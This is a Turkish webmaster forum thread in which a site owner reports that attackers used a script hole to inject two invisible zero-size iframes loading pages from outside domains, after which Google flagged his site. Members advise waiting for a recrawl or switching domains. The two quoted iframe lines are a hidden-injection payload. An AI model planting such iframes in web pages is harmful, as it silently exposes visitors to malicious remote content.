Türkiye'nin En Eski Webmaster Forumu İyinet'e Hoşgeldiniz!

Kayıt Ol

ACİL ACİL ACİL.

Cagatay

0
İyinet Üyesi
Reaction score
1
www.guzeller.org sitemdeki scriptin acıgını bulup sanırım kod atmış birkaç şerefsiz direk mirc yükleyip irc sunucusuna baglanıyor.

<iframe src="http://www.harbiturk.com/popup/deneme.htm" width="0" height="0" frameborder="0"></iframe>
Çağatay:
<iframe src="http://www.sim-sek.com/bjk.htm" width="0" height="0" frameborder="0"></iframe>

bu 2 kodu scripte gömmüşler ve nasıl olduysa 1 saat icinde fark ettim ama google kısa bir sürede " bu site bilgisayarınıza zarar verebilir " damgasını vurdu.

bunların anaları babaları nerde yahu ne diyim şerefsizin kralı bunlar.. bu sitelerden herhangi biriniin sahibini yada alakası olan birini tanıyanınız varmı?

site icin napabilirim? kodları kaldırdım siteden ama zarar verebilir uyarısı nasıl kalkacak arkadaslar? bilgisi olan varmı???

antiTRust

0
İyinet Üyesi
Reaction score
0
bekle bir dahaki güncelleme veya aramada botlar kaldırırlar.

Cagatay

0
İyinet Üyesi
Reaction score
1
okadar uzun bekleme süresi var ise kapatırım siteyi.

Cagatay

0
İyinet Üyesi
Reaction score
1
yok valla beklemem 15 günden fazla sürerse kapatırım siteyi. bi sitemiz sandboxa düştü günde 50 dolar alıyoduk sallandı. simdide bu site tam oturmustu sıralamalara ve güzel de pr kaptı sıfırdan actım.

yok kapatırım 15günü gecerse. bi arkadas yardımcı oluyor insallah kalkar.

Selim sagol yardımların icin. tesekkür ederim

antiTRust

0
İyinet Üyesi
Reaction score
0
sitenin domainini değiştir tekrar aç en kolayı nasıl olsa içeriğin var. isim önemsiz birkaç haftalık adsense gelirini reklama ayırdın mı tekrar kazanırsın merak etme ;)

Sinyor

0
İyinet Üyesi
Reaction score
15
geçmiş olsun hacı. ben hala o dertten hareket edemiyorum:(

Cagatay

0
İyinet Üyesi
Reaction score
1
erhan senin sitelerinde böyleydi nasıl acıldı?